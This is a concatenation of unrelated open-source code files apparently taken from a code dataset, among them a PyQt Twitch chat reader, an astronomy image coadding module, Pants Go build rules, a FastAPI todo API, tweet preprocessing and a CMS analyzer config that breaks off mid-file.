@AssemblyParams
def __init__(self, optimizer,T_max, eta_min=0, last_epoch=-1, name=None,iters=None,factor=None):
self.T_max = T_max
self.eta_min = eta_min
super(_WarmupLRScheduler, self).__init__(optimizer, last_epoch)
def get_lr(self, iter):
warmup_factor = self.get_warmup_factor_at_iter(iter)
if iter <= self.warmup_iters:
return [self.eta_min + warmup_factor*(base_lr - self.eta_min) for base_lr in self.base_lrs]
return [self.eta_min + (base_lr - self.eta_min) *
(1 + math.cos(math.pi * self.last_epoch / self.T_max)) / 2
for base_lr in self.base_lrs] | StarcoderdataPython |
1625112 | <reponame>ozemsbg/Mitty
__version__ = '2.28.3' | StarcoderdataPython |
3243706 | from .home import *
| StarcoderdataPython |
3360371 | <reponame>metakirby5/tron-ai<gh_stars>0
#!/usr/bin/python
"""Template for your tron bot"""
import tron
import random
def which_move(board):
return tron.NORTH
# you do not need to modify this part
for board in tron.Board.generate():
tron.move(which_move(board))
| StarcoderdataPython |
1690077 | <filename>caluma/workflow/tests/test_visibilities.py
import pytest
from ...form import models as form_models
from ...form.schema import Answer, Document
from .. import models
from ..schema import Case, WorkItem
from ..visibilities import AddressedGroups
@pytest.mark.parametrize(
"work_item__addressed_groups,size", [(["unknown"], 0), (["admin", "other"], 1)]
)
def test_assigned_groups_work_item_visibility(db, admin_info, size, work_item):
queryset = AddressedGroups().filter_queryset(
WorkItem, models.WorkItem.objects, admin_info
)
assert queryset.count() == size
@pytest.mark.parametrize(
"work_item__addressed_groups,size", [(["unknown"], 0), (["admin", "other"], 1)]
)
def test_assigned_groups_case_visibility(db, admin_info, size, work_item):
queryset = AddressedGroups().filter_queryset(Case, models.Case.objects, admin_info)
assert queryset.count() == size
@pytest.mark.parametrize(
"work_item__addressed_groups,size", [(["unknown"], 0), (["admin", "other"], 1)]
)
def test_assigned_groups_document_visibility(db, admin_info, size, work_item):
queryset = AddressedGroups().filter_queryset(
Document, form_models.Document.objects, admin_info
)
assert queryset.count() == size
@pytest.mark.parametrize(
"work_item__addressed_groups,size", [(["unknown"], 0), (["admin", "other"], 1)]
)
def test_assigned_groups_answer_visibility(db, admin_info, size, work_item, answer):
queryset = AddressedGroups().filter_queryset(
Answer, form_models.Answer.objects, admin_info
)
assert queryset.count() == size
| StarcoderdataPython |
160312 | import sys
import os
from pathlib import Path
from PyQt5.QtCore import QThread, pyqtSignal
from PyQt5.QtWidgets import QApplication, QWidget, QToolTip, QPushButton, QGridLayout, QLineEdit, QLabel
from PyQt5.QtGui import QFont
from utils import get_chat, get_chat_contents, text_to_speech
os.chdir(sys.path[0]) # Change Current Directory to the location of gui.py
class GetChatThread(QThread):
"""Subclass of `QThread` that is used to call the `get_chat` function
Attributes:
signal (PyQT5.QtCore.pyqtSignal): Signal that is used to communicate between objects
"""
signal = pyqtSignal('PyQt_PyObject')
def run(self):
"""Method is invoked when the thread is started
This in turn starts the `get_chat` function in a new thread
"""
self.signal.emit(get_chat(self.channel_name))
class GetChatContentsThread(QThread):
"""Subclass of `QThread` that is used to call the `get_chat_contents` function
Attributes:
signal (PyQT5.QtCore.pyqtSignal): Signal that is used to communicate between objects
"""
signal = pyqtSignal('PyQt_PyObject')
def __init__(self, path, from_):
"""Constructor
Args:
path (str): Name of the current channel
from_ (str): Name of the button that invoked this function
"""
self.path = path
self.from_ = from_
super().__init__()
def run(self):
"""Method is invoked when the thread is started
This in turn starts the `get_chat_contents` function in a new thread
"""
self.signal.emit(get_chat_contents(self.path, self.from_))
class TTSThread(QThread):
"""Subclass of `QThread` that is used to call the `text_to_speech` function
Attributes:
signal (PyQT5.QtCore.pyqtSignal): Signal that is used to communicate between objects
"""
signal = pyqtSignal('PyQt_PyObject')
def __init__(self, data):
"""Constructor
Args:
data (str): Chat message that is to be converted to speech
"""
self.data = data
super().__init__()
def run(self):
"""Method is invoked when the thread is started
This in turn starts the `text_to_speech` function in a new thread
"""
self.signal.emit(text_to_speech(self.data))
class HomeScreen(QWidget):
"""The Main GUI Window for the application, inherited from `QWidget`
Attributes:
channel_name_text_field (QLineEdit): Text Field for Channel Name
chat_content_label (QLabel): Label for Channel Name Text Field
get_chat_contents_thread (QThread): Thread object used to call `get_chat_contents`
get_chat_thread (QThread): Thread object used to call `get_chat`
grid (QGridLayout): Grid Layout for the entire GUI
mention_button (QPushButton): Button that reads any chats that has mentioned the name of the channel (`eg: @channel_name`)
read_last_button (QPushButton): Button that reads the last chat message from the IRC stream
read_random_button (QPushButton): Button that reads any random message from the IRC stream
start_chat_button (QPushButton): Starts a thread that establishes a socket connection and logs the chats
tts_thread (QThread): Thread object used to call `text_to_speech`
"""
def __init__(self):
"""Setup the GUI Widgets and Button"""
super().__init__()
Path('logs').mkdir(exist_ok=True)
QToolTip.setFont(QFont('SansSerif', 10))
self.setGeometry(300, 300, 300, 220)
self.setWindowTitle('TwitchReader')
self.grid = QGridLayout()
self.grid.setSpacing(10)
self.setLayout(self.grid)
self.channel_name_text_field = QLineEdit(self)
self.channel_name_text_field.setPlaceholderText('Channel Name')
self.grid.addWidget(self.channel_name_text_field, 0, 0)
self.channel_name_text_field.textEdited.connect(self.validate)
self.start_chat_button = QPushButton('Start', self)
self.grid.addWidget(self.start_chat_button, 0, 1)
self.start_chat_button.setEnabled(False)
self.start_chat_button.clicked.connect(self.start_chat)
self.get_chat_thread = GetChatThread()
self.chat_content_label = QLabel(self)
self.chat_content_label.setWordWrap(True)
self.grid.addWidget(self.chat_content_label, 1, 0, 1, 2)
self.read_random_button = QPushButton('Read Random', self)
self.grid.addWidget(self.read_random_button, 2, 0)
self.read_random_button.setEnabled(False)
self.read_random_button.clicked.connect(self.start_text_to_speech)
self.read_last_button = QPushButton('Read Last', self)
self.grid.addWidget(self.read_last_button, 2, 1)
self.read_last_button.setEnabled(False)
self.read_last_button.clicked.connect(self.start_text_to_speech)
self.mention_button = QPushButton('@ me', self)
self.grid.addWidget(self.mention_button, 3, 0, 1, 2)
self.mention_button.setEnabled(False)
self.mention_button.clicked.connect(self.start_text_to_speech)
self.show()
def validate(self):
"""Helper method to enable the "Start" (`start_chat_button`) button"""
self.start_chat_button.setEnabled(bool(self.channel_name_text_field.text().strip()))
def start_chat(self):
"""Helper method that calls the actual method that connects to the IRC stream using a socket
Disables the "Start" button after it is started
Enables the "Read Random", "Read Last" and "@ me" button after it is started
This prevents the user from trying to start more than one thread for logging in the same GUI
Start the GUI app as a different process to enable logging across multiple channels
"""
self.start_chat_button.setEnabled(False)
self.channel_name_text_field.setDisabled(True)
toggle = (self.read_random_button, self.read_last_button, self.mention_button)
for button in toggle:
getattr(button, 'setEnabled')(True)
self.get_chat_thread.channel_name = self.channel_name_text_field.text().strip()
self.get_chat_thread.start()
def start_text_to_speech(self):
"""Helper method that retrieves the chat message that is to be converted to speech"""
self.toggle_button('stub', False)
self.get_chat_contents_thread = GetChatContentsThread(self.get_chat_thread.channel_name, self.sender().text())
self.get_chat_contents_thread.signal.connect(self.stop_text_to_speech)
self.get_chat_contents_thread.start()
def stop_text_to_speech(self, chat):
"""Helper method that converts the chat message to speech
Calls the `text_to_speech` method in a thread
Args:
chat (dict): Dictionary of the chat message that is to be converted to speech
"""
state, chat_to_read = chat
if not state:
self.chat_content_label.setText(chat_to_read)
self.toggle_button(
'stub') # is it better to just enable the buttons here instead of passing a stub signal to a method?
else:
data = f"{chat_to_read['username']} says {chat_to_read['comment']}"
self.chat_content_label.setText(data)
self.tts_thread = TTSThread(data)
self.tts_thread.signal.connect(self.toggle_button)
self.tts_thread.start()
def toggle_button(self, signal, state=True):
"""Used to toggle the state of buttons
Args:
signal (str): stub argument, no actual use
state (bool, optional): State to toggle the buttonsm `True` = enable, `False` = disable
"""
self.read_random_button.setEnabled(state)
self.read_last_button.setEnabled(state)
self.mention_button.setEnabled(state)
app = QApplication(sys.argv)
ex = HomeScreen()
app.exec_()
| StarcoderdataPython |
3250374 | # -*- coding: utf-8 -*-
from .focal_loss import *
from .iou_loss import *
from .cross_entropy_loss import *
from .bce_with_logits_loss import *
from .gfocal_loss import *
from .mse_loss import *
from .smooth_l1_loss import *
| StarcoderdataPython |
103263 | <gh_stars>0
import argparse
from pRestore.stuff import Stuff
from pRestore.backup import Backup
from pRestore.restore import Restore
Stuff.print_logo()
description = 'pRestore is a software used to make backup of file permissions and restore them in case of disaster'
parser = argparse.ArgumentParser(description=description)
parser.add_argument('target', metavar='D', type=str, nargs=1, help='Target directory/Restore file')
parser.add_argument('--backup', dest='backup', action='store_const', const=True, default=False,
help='Make a backup of the target directory')
parser.add_argument('--restore', dest='restore', action='store_const', const=True, default=False,
help='Restore permissions from the target backup file')
parser.add_argument('--out', help='Output directory where to store the backup', default='.')
parser.add_argument('--threads', default=10,
help='The maximum number of threads that will be used for making the backup or restoring permissions')
parser.add_argument('--verbose', dest='verbose', action='store_const', default=False, const=True,
help='Display more detailed information about what the script is doing')
arguments = parser.parse_args()
target = arguments.target[0]
backup = arguments.backup
restore = arguments.restore
out = arguments.out
threads = arguments.threads
verbose = arguments.verbose
if restore:
Restore(target, threads, verbose)
else:
Backup(target, out, threads, verbose)
| StarcoderdataPython |
128641 | import numpy as np
from .lanczos import lanczos_resample_three, lanczos_resample_one
def invert_affine_transform_wcs(u, v, wcs):
"""Invert a galsim.AffineTransform WCS.
The AffineTransform WCS forward model is
[u, v] = Jac * ([x, y] - origin) + world_origin
where the `*` is a matrix multiplication and `[u, v]` is a column
vector, etc.
Parameters
----------
u : np.ndarray
The first world coordinate value.
v : np.ndarray
The second world coordinate value.
wcs : galsim.AffineTransform
The AffineTransform WCS object to invert.
Returns
-------
x : np.ndarray
The first image coordinate value.
y : np.ndarray
The second image coordinate value.
"""
invmat = np.linalg.inv(
np.array([[wcs.dudx, wcs.dudy], [wcs.dvdx, wcs.dvdy]]))
du = u - wcs.u0
dv = v - wcs.v0
x = invmat[0, 0] * du + invmat[0, 1] * dv + wcs.x0
y = invmat[1, 0] * du + invmat[1, 1] * dv + wcs.y0
return x, y
def coadd_image_noise_interpfrac(
se_images, se_noises, se_interp_fracs, se_wcs_objs,
coadd_wgts, coadd_scale, coadd_dim):
"""Coadd a set of SE images, noise fields, and interpolation fractions.
Parameters
----------
se_images : list of np.ndarray
The list of SE images to coadd.
se_noises : list of np.ndarray
The list of SE noise images to coadd.
se_interp_fracs : list of np.ndarray
The list of SE interpolated fraction images to coadd.
se_wcs_objs : list of galsim.BaseWCS or children
The WCS objects for each of the SE images.
coadd_wgts : 1d array-like object of floats
The relative coaddng weights for each of the SE images.
coadd_scale : float
The pixel scale of desired coadded image.
coadd_dim : int
The number of pixels desired for the final coadd image..
Returns
-------
img : np.ndarray, shape (coadd_dim, coadd_dim)
The coadd image.
nse : np.ndarray, shape (coadd_dim, coadd_dim)
The coadd noise image.
intp : np.ndarray, shape (coadd_dim, coadd_dim)
The interpolated flux fraction in each coadd pixel.
"""
# coadd pixel coords
y, x = np.mgrid[0:coadd_dim, 0:coadd_dim]
u = x.ravel() * coadd_scale
v = y.ravel() * coadd_scale
coadd_image = np.zeros((coadd_dim, coadd_dim), dtype=np.float64)
coadd_noise = np.zeros((coadd_dim, coadd_dim), dtype=np.float64)
coadd_intp = np.zeros((coadd_dim, coadd_dim), dtype=np.float32)
wgts = coadd_wgts / np.sum(coadd_wgts)
for se_im, se_nse, se_intp, se_wcs, wgt in zip(
se_images, se_noises, se_interp_fracs, se_wcs_objs, wgts):
se_x, se_y = invert_affine_transform_wcs(u, v, se_wcs)
im, nse, intp, _ = lanczos_resample_three(
se_im / se_wcs.pixelArea(),
se_nse / se_wcs.pixelArea(),
se_intp,
se_y,
se_x)
coadd_image += (im.reshape((coadd_dim, coadd_dim)) * wgt)
coadd_noise += (nse.reshape((coadd_dim, coadd_dim)) * wgt)
coadd_intp += (intp.reshape((coadd_dim, coadd_dim)) * wgt)
coadd_image *= (coadd_scale**2)
coadd_noise *= (coadd_scale**2)
return coadd_image, coadd_noise, coadd_intp
def coadd_psfs(
se_psfs, se_wcs_objs, coadd_wgts,
coadd_scale, coadd_dim, coadd_offset, se_offsets):
"""Coadd the PSFs.
Parameters
----------
se_psfs : list of np.ndarray
The list of SE PSF images to coadd.
se_wcs_objs : list of galsim.BaseWCS or children
The WCS objects for each of the SE PSFs.
coadd_wgts : 1d array-like object of floats
The relative coaddng weights for each of the SE PSFs.
coadd_scale : float
The pixel scale of desired coadded PSF image.
coadd_dim : int
The number of pixels desired for the final coadd PSF.
coadd_offset : float
The offset in pixels of the start of the coadd PSF image stamp.
se_offsets : list of tuples of floats
The offset in the SE image coords of the start of the SE PSF
image.
Returns
-------
psf : np.ndarray
The coadded PSF image.
"""
# coadd pixel coords
y, x = np.mgrid[0:coadd_dim, 0:coadd_dim]
u = (coadd_offset + x.ravel()) * coadd_scale
v = (coadd_offset + y.ravel()) * coadd_scale
coadd_image = np.zeros((coadd_dim, coadd_dim), dtype=np.float64)
wgts = coadd_wgts / np.sum(coadd_wgts)
for se_psf, se_wcs, wgt, se_offset in zip(
se_psfs, se_wcs_objs, wgts, se_offsets):
se_x, se_y = invert_affine_transform_wcs(u, v, se_wcs)
se_x -= se_offset[0]
se_y -= se_offset[1]
im, _ = lanczos_resample_one(se_psf / se_wcs.pixelArea(), se_y, se_x)
coadd_image += (im.reshape((coadd_dim, coadd_dim)) * wgt)
coadd_image *= (coadd_scale**2)
return coadd_image
| StarcoderdataPython |
43535 | <filename>data/english_tweets/preprocess_tweets.py
import csv
import re
import string
def remove_chars(text):
# remove links
pattern = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
text = pattern.sub('', text)
# remove tags
text = re.sub(r'\w*@\w*', '', text)
# remove punctuations
text = text.translate(str.maketrans('', '', string.punctuation))
# remove newlines and strip text
text = text.replace("\n", "").strip()
return text
if __name__ == "__main__":
pos = 2363
neg = 2363
with open('Tweets.csv', mode='r') as csv_file:
with open('even_dataset.txt', "w") as train_file:
csv_reader = csv.DictReader(csv_file)
line_count = 0
for row in csv_reader:
if line_count == 0:
print(f'Column names are {", ".join(row)}')
line_count += 1
text = row["text"]
text = remove_chars(text)
if row["airline_sentiment"] == "positive" and pos > 0:
pos -= 1
train_file.write(f'__label__2 {text}' + "\n")
elif neg > 0:
neg -= 1
train_file.write(f'__label__1 {text}' + "\n")
line_count += 1
if neg == 0 and pos == 0:
break
print(f'Processed {line_count} lines.') | StarcoderdataPython |
3220182 | <filename>Contacts/migrations/0005_auto_20180303_0307.py<gh_stars>0
# Generated by Django 2.0.2 on 2018-03-03 03:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Contacts', '0004_auto_20180303_0304'),
]
operations = [
migrations.AlterField(
model_name='contact',
name='phone',
field=models.IntegerField(),
),
]
| StarcoderdataPython |
1755262 | <reponame>nabint/profiles-rest-api<filename>profiles_api/views.py
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework.authentication import TokenAuthentication
from rest_framework import viewsets
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from rest_framework.permissions import IsAuthenticated
from profiles_api import serializers
from profiles_api import models
from profiles_api import permissions
class HelloApiView(APIView):
"""Test API View"""
# this should be serializer_class not other name
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Returns a list of APIView features"""
an_apiview = [
'Uses HTTP methods as function (get,post,patch,put,delete)',
'Is similar to a traditional Django View',
'Gives us the most control over our applications',
'Is mapped manually to URLs',
]
return Response({'message': 'Hello!', 'an_apiview': an_apiview})
def post(self, request):
""""Creates a hello message with our name"""
serializerss = self.serializer_class(data=request.data)
if serializerss.is_valid():
name = serializerss.validated_data.get('name')
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializerss.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None):
"""Handles updating an object"""
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
"""Handles a partial update of object"""
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
"""Deletes an object"""
return Response({'method': 'DELETE'})
class HelloViewSets(viewsets.ViewSet):
serializer_class = serializers.HelloSerializer
"""Test API Viewsets"""
def list(self, request):
"""Return a hello message"""
a_viewsets = [
'Uses actions (list,create,retrieve,update,partial_update)',
'Automaticaly maps to URLs using Routers',
'Provides more functionality with less code'
]
return Response({'message': 'Hello!', 'a_viewsets': a_viewsets})
def create(self, request):
"""Create a new Hello message"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handles Getting Object by its ID"""
return Response({'http_method': "GET"})
def update(self, request, pk=None):
"""Handles Updating an object"""
return Response({'HTTP_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handles updating a part of object"""
return Response({'http_method': 'Patch'})
def destroy(self, request, pk=None):
"""Handles destroying an object"""
return Response({"Http_method": "DELETE"})
class UserProfileViewSet(viewsets.ModelViewSet):
"""Handle creating and updating profiels"""
serializer_class = serializers.UserProfileSerializer
filter_backends = (filters.SearchFilter,)
search_fields = ('name', 'email',)
queryset = models.UserProfile.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (permissions.UpdateOwnProfile,)
class UserLoginApiView(ObtainAuthToken):
"""Handle creating user authentication tokens"""
# it doesn't enable itself in browseable api
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
"""Handles creaing,reading, and updating profile feed items"""
authentication_classes = (TokenAuthentication,)
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (
permissions.UpdateOwnStatus,
IsAuthenticated,
)
def perform_create(self, serializer):
"""Sets the user profile to logged in user"""
serializer.save(user_profile=self.request.user)
| StarcoderdataPython |
198771 | <filename>src/olympia/addons/migrations/0018_auto_20200803_1311.py
# Generated by Django 2.2.14 on 2020-08-03 13:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('addons', '0017_addonreviewerflags_notified_about_expiring_delayed_rejections'),
]
operations = [
migrations.AlterField(
model_name='addonreviewerflags',
name='notified_about_expiring_info_request',
field=models.NullBooleanField(default=None),
),
]
| StarcoderdataPython |
70808 | <reponame>pseudonym117/kernel-graphql<gh_stars>1-10
from . import riotapi
@riotapi.route('/')
def index():
return 'hello world!'
| StarcoderdataPython |
134822 | from flask import Flask, session
app = Flask(__name__)
app.secret_key = " "
| StarcoderdataPython |
3250006 |
# coding: utf-8
# # Setup Notebook
# In[2]:
# Standard library
import os
import sys
sys.path.append("../src/")
# Third party imports
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
# In[3]:
# Customizations
sns.set() # matplotlib defaults
# Any tweaks that normally go in .matplotlibrc, etc., should explicitly go here
plt.rcParams['figure.figsize'] = (12, 8)
get_ipython().magic("config InlineBackend.figure_format='retina'")
# In[4]:
# Find the notebook the saved figures came from
fig_prefix = "../figures/2017-01-14-tc-"
# ## Load Data
# In[7]:
datfile = '../../zzData_RAW/P00000001-ALL.csv'
cols = ['cand_nm', 'contbr_st', 'contbr_employer', 'contb_receipt_amt', 'contbr_occupation', 'contb_receipt_amt', 'contb_receipt_dt']
donate = pd.read_csv(datfile, index_col=False, dtype='object', usecols = cols)
donate['contb_receipt_amt'] = pd.to_numeric(donate['contb_receipt_amt'])
# donate['contb_receipt_dt'] = pd.to_datetime(donate['contb_receipt_dt'])
donate.dtypes
# ## Review Data
# In[8]:
import qgrid # Best practices is to put imports at the top of the Notebook.
qgrid.nbinstall(overwrite=True)
# In[9]:
donate.head()
# In[10]:
qgrid.show_grid(donate.head(), remote_js=True)
# In[11]:
donate.groupby('cand_nm').mean()
# In[56]:
sns.stripplot(x="cand_nm", y="contb_receipt_amt", data=donate[10000:20000]);
# In[ ]:
#x = np.random.normal(size=100)
sns.distplot(donate['contb_receipt_amt'], bins=20, kde=False, rug=True);
# In[ ]:
| StarcoderdataPython |
3282931 | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import json
import logging
import os
from dataclasses import dataclass
from pants.backend.go.target_types import GoModSourcesField
from pants.backend.go.util_rules.sdk import GoSdkProcess
from pants.base.specs import AddressSpecs, AscendantAddresses
from pants.build_graph.address import Address
from pants.engine.engine_aware import EngineAwareParameter
from pants.engine.fs import Digest
from pants.engine.process import ProcessResult
from pants.engine.rules import Get, collect_rules, rule
from pants.engine.target import (
HydratedSources,
HydrateSourcesRequest,
InvalidTargetException,
UnexpandedTargets,
WrappedTarget,
)
from pants.util.docutil import bin_name
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class OwningGoModRequest(EngineAwareParameter):
address: Address
def debug_hint(self) -> str:
return self.address.spec
@dataclass(frozen=True)
class OwningGoMod:
address: Address
@rule
async def find_nearest_go_mod(request: OwningGoModRequest) -> OwningGoMod:
# We don't expect `go_mod` targets to be generated, so we can use UnexpandedTargets.
candidate_targets = await Get(
UnexpandedTargets, AddressSpecs([AscendantAddresses(request.address.spec_path)])
)
# Sort by address.spec_path in descending order so the nearest go_mod target is sorted first.
go_mod_targets = sorted(
(tgt for tgt in candidate_targets if tgt.has_field(GoModSourcesField)),
key=lambda tgt: tgt.address.spec_path,
reverse=True,
)
if not go_mod_targets:
raise InvalidTargetException(
f"The target {request.address} does not have a `go_mod` target in its BUILD file or "
"any ancestor BUILD files. To fix, please make sure your project has a `go.mod` file "
f"and add a `go_mod` target (you can run `{bin_name()} tailor` to do this)."
)
nearest_go_mod_target = go_mod_targets[0]
return OwningGoMod(nearest_go_mod_target.address)
@dataclass(frozen=True)
class GoModInfo:
# Import path of the Go module, based on the `module` in `go.mod`.
import_path: str
digest: Digest
mod_path: str
minimum_go_version: str | None
@dataclass(frozen=True)
class GoModInfoRequest(EngineAwareParameter):
source: Address | GoModSourcesField
def debug_hint(self) -> str:
if isinstance(self.source, Address):
return self.source.spec
else:
return self.source.address.spec
@rule
async def determine_go_mod_info(
request: GoModInfoRequest,
) -> GoModInfo:
if isinstance(request.source, Address):
wrapped_target = await Get(WrappedTarget, Address, request.source)
sources_field = wrapped_target.target[GoModSourcesField]
else:
sources_field = request.source
go_mod_path = sources_field.go_mod_path
go_mod_dir = os.path.dirname(go_mod_path)
# Get the `go.mod` (and `go.sum`) and strip so the file has no directory prefix.
hydrated_sources = await Get(HydratedSources, HydrateSourcesRequest(sources_field))
sources_digest = hydrated_sources.snapshot.digest
mod_json = await Get(
ProcessResult,
GoSdkProcess(
command=("mod", "edit", "-json"),
input_digest=sources_digest,
working_dir=go_mod_dir,
description=f"Parse {go_mod_path}",
),
)
module_metadata = json.loads(mod_json.stdout)
return GoModInfo(
import_path=module_metadata["Module"]["Path"],
digest=sources_digest,
mod_path=go_mod_path,
minimum_go_version=module_metadata.get("Go"),
)
def rules():
return collect_rules()
| StarcoderdataPython |
50853 | from typing import List
from webbrowser import get
from fastapi import APIRouter, Response
from .schemas import TodoItem, TodoPayload, UserPayload #,User
#-----Agregado jtortolero-----
from sqlalchemy.orm import Session
from fastapi import Depends, HTTPException, status
from .models import Item, User
from .utils import password_hash
from .oauth2 import *
#-----------------------------
router = APIRouter()
@router.get("/items/", response_model=List[TodoItem])
def get_items(db:Session=Depends(get_db)):
"""Retrieve a persistent list of items."""
# TODO: Implement this
items = db.query(Item).filter(Item.title).all()
return items
@router.get("/items/{id}", response_model=TodoItem)
def get_item(id: int, db:Session=Depends(get_db)):
"""Retrieve a particular item from the store."""
# TODO: Implement this.
item = db.query(Item).filter(Item.id==id).first()
if not item:
raise HTTPException(status_code = status.HTTP_404_NOT_FOUND,
detail=f'Item con id={id} no existe')
return item
@router.post(
path="/items/",
response_model=TodoItem,
status_code=201,
response_description="The item has been created successfully.",
)
def create_item(payload: TodoPayload, db:Session=Depends(get_db), current_user:User=Depends(get_current_user)):
"""Add an item to the store."""
# TODO: Implement this.
# Requirements:
# * Ensure an user is authenticated with basic credentials.
# * Add the username to the item.
new_item = Item(user_id=current_user.id, **Item.dict())
db.add(new_item)
db.commit()
db.refresh(new_item)
return new_item
@router.put("/items/{id}", response_model=TodoItem)
def update_item(id: int, payload: TodoPayload, db:Session=Depends(get_db),
current_user: User=Depends(get_current_user)):
# TODO: Implement this.
# * Ensure the user is authenticated. If not, either return a 401 response
# or raise an `HttpException` with a 401 code.
# * Ensure that the item is stored already in the datastore. If not, raise
# an `HttpException` with a 404 code or return a 404 response.
# * Check the username matches the item's username. If not, return a 403
# response or raise a `HttpException` with a 403 code.
# * Apply the update and save it to the database.
item_query = db.query(Item).filter(Item.id == id)
item_update = item_query.first()
if item_update == None:
raise HTTPException(status.HTTP_404_NOT_FOUND,
detail=f"post {id} no fue encontrado")
if item_update.user_id != current_user.id:
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="No esta autorizado para realizar esta accion")
item_query.update(payload.dict(), synchronize_session=False)
db.commit()
return item_query.first()
@router.delete("/items/{id}", response_class=Response, status_code=204)
def remove_item(id: int, db:Session=Depends(get_db), current_user: int= Depends(get_current_user)):
# TODO: Implement this
# 1. Check that the item exists in the datastore.
# 2. Ensure the user is authenticated.
# 3. Check if the currently logged username matches.
# 4. Remove the item from the store.
item_query = db.query(Item).filter(Item.id == id)
item = item_query.first()
if item == None:
raise HTTPException(status.HTTP_404_NOT_FOUND,
detail=f"Item {id} no fue encontrado")
if item.user_id != current_user.id:
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="No esta autorizado para realizar esta accion")
item_query.delete(synchronize_session=False)
db.commit()
return Response(status_code=status.HTTP_204_NO_CONTENT)
@router.post("/users/")
def create_user(payload: UserPayload, db:Session=Depends(get_db)):
# TODO: Implement this.
# 1. Validate the username has no uppercase letter, @ sign, nor
# punctuations.
# 2. Hash the password and store the user in the data store.
user = User(
name = payload.name,
username = payload.username,
email = payload.email,
password = password_hash(payload.password)
)
db.add(user)
db.commit()
db.refresh(user)
return user
# TODO: Document this endpoint
@router.get("/users/me")
def get_current_user():
user = get_current_user
return user
| StarcoderdataPython |
1784650 | <filename>services/sms/config.py
import os
class BaseConfig:
"""Base configuration"""
DEBUG = False
TESTING = False
TWILIO_ACCOUNT_SID=os.environ['TWILIO_ACCOUNT_SID']
TWILIO_AUTH_TOKEN=os.environ['TWILIO_AUTH_TOKEN']
| StarcoderdataPython |
1751040 | <reponame>JoanAzpeitia/lp_sg
# Copyright (c) 2013 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
import os
import sys
from tank.platform.qt import QtCore, QtGui
class ThumbnailLabel(QtGui.QLabel):
def __init__(self, parent=None):
QtGui.QLabel.__init__(self, parent)
def setPixmap(self, pixmap):
# scale the pixmap down to fit
if pixmap.height() > 40 or pixmap.width() > 60:
# scale it down to 120x80
pixmap = pixmap.scaled( QtCore.QSize(60,40), QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation)
# now slap it on top of a 120x80 transparent canvas
rendered_pixmap = QtGui.QPixmap(60, 40)
rendered_pixmap.fill(QtCore.Qt.transparent)
w_offset = (60 - pixmap.width()) / 2
h_offset = (40 - pixmap.height()) / 2
painter = QtGui.QPainter(rendered_pixmap)
painter.drawPixmap(w_offset, h_offset, pixmap)
painter.end()
# and finally assign it
QtGui.QLabel.setPixmap(self, rendered_pixmap)
| StarcoderdataPython |
4806383 | from django import template
from django.db.utils import OperationalError
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
register = template.Library()
@register.filter(name='has_group')
def has_group(user, group_name):
"""
Function to know if a user belong to a users group inside the template.
:param User user: User to be check .
:param str group_name: Name of the group to ask for.
:return: True or False
:rtype: bool
"""
return user.groups.filter(name=group_name).exists()
| StarcoderdataPython |
1624263 | <filename>Calibration/HcalCalibAlgos/python/gammaJetAnalysis_cfi.py
import FWCore.ParameterSet.Config as cms
from RecoJets.Configuration.RecoJets_cff import *
from RecoJets.Configuration.RecoPFJets_cff import *
from CommonTools.ParticleFlow.pfNoPileUp_cff import *
GammaJetAnalysis = cms.EDAnalyzer('GammaJetAnalysis',
rhoColl = cms.InputTag("fixedGridRhoFastjetAll"),
PFMETColl = cms.InputTag("pfMet"),
PFMETTYPE1Coll = cms.InputTag("pfType1CorrectedMet"),
photonCollName = cms.string('gedPhotons'),
pfJetCollName = cms.string('ak4PFJetsCHS'),
pfJetCorrName = cms.string('ak4PFCHSL2L3'),
genJetCollName = cms.string('ak4GenJets'),
genParticleCollName = cms.string('genParticles'),
genEventInfoName = cms.string('generator'),
hbheRecHitName = cms.string('hbhereco'),
hfRecHitName = cms.string('hfreco'),
hoRecHitName = cms.string('horeco'),
rootHistFilename = cms.string('PhotonPlusJet_tree.root'),
pvCollName = cms.string('offlinePrimaryVertices'),
beamSpotName= cms.string('offlineBeamSpot'),
conversionsName= cms.string('allConversions'),
electronCollName= cms.string('gedGsfElectrons'),
photonIdTightName= cms.InputTag('PhotonIDProdGED','PhotonCutBasedIDTight'),
photonIdLooseName= cms.InputTag('PhotonIDProdGED','PhotonCutBasedIDLoose'),
prodProcess = cms.untracked.string('reRECO'),
allowNoPhoton = cms.bool(False),
photonJetDPhiMin = cms.double(2.0), # 0.75 pi= 2.356, 0.7 pi=2.2
photonPtMin = cms.double(15.),
